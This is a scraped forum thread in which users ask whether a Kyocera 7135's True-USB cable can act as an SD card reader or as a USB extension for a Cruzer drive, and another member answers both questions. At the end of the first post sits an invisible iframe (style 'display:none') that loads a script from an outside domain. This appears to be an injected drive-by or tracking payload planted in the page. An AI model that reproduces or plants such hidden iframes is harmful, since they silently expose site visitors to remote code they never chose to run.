+ Reply to Thread

True-USB Cable 7135--as SD-MMC card reader-writer

Hello!

This is my first post, so all the exciting accolades to this site will be at the bottom...

The question--I remembered seeing it discussed somewhere, but it did not come up in any searches so here goes:

I just got a tru-usb cable, and attached it to a winxp pc--sync and all worked fine, but the SD card did not show up as a drive.
    Can you use the 7135, when connected via the usb cable as a sd-mmc card reader-writer??

Thanks.

This site rules!
    Was able to find out just about everything on the phone from people who put it through real use, and have the "hmm, is that a bug" worries put to rest.
    I will post more of my experience with the phone (i.e. crashed requiring a soft-reset while on a call--but was able to continue the call, and reset later!! I have not seen that one before, right?) later...
    Thanks for the good site.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: True-USB Cable 7135--as SD-MMC card reader-writer

Originally posted by adam99
    Hello!

This is my first post, so all the exciting accolades to this site will be at the bottom...

The question--I remembered seeing it discussed somewhere, but it did not come up in any searches so here goes:

I just got a tru-usb cable, and attached it to a winxp pc--sync and all worked fine, but the SD card did not show up as a drive.
    Can you use the 7135, when connected via the usb cable as a sd-mmc card reader-writer??

Nope. Doesn't work that way..... Want to buy a Cruzer cheap? I wound up with two and really only need one. PM me with an offer if interested.

Alan

True USB Cable & Jumpdrive/Cruzer

Will a Jumpdrive/Cruzer fit on the end of a Kyocera True USB cable? I want to use it with a desktop PC and I'm too old and fat to crawl under the desk to attach the Jumpdrive to the rear of the PC each time I want to add to the SD card. In other words, I want the cable to act as an "extension cord" for the USB Port.

I didn't know if the end that fits the 7135 is specific for the phone, or if that is what a usb port looks like. I haven't received the Jumpdrive yet, so I don't know what it looks like either.

I searched the FAQ's and came up with this thread.

Thanks for your help!
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

A Cruzer won't It won't fit on the end of the Kyo true USB cable (wrong type of connector) but you can get USB extension cables to essentially move your connector from the back of the PC to your desktop, or get a USB hub and install it on the desktop so you can plug in multiple USB devices at the same time.

Alan

Thank You Alan!!!!!!!!!!!!!!
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"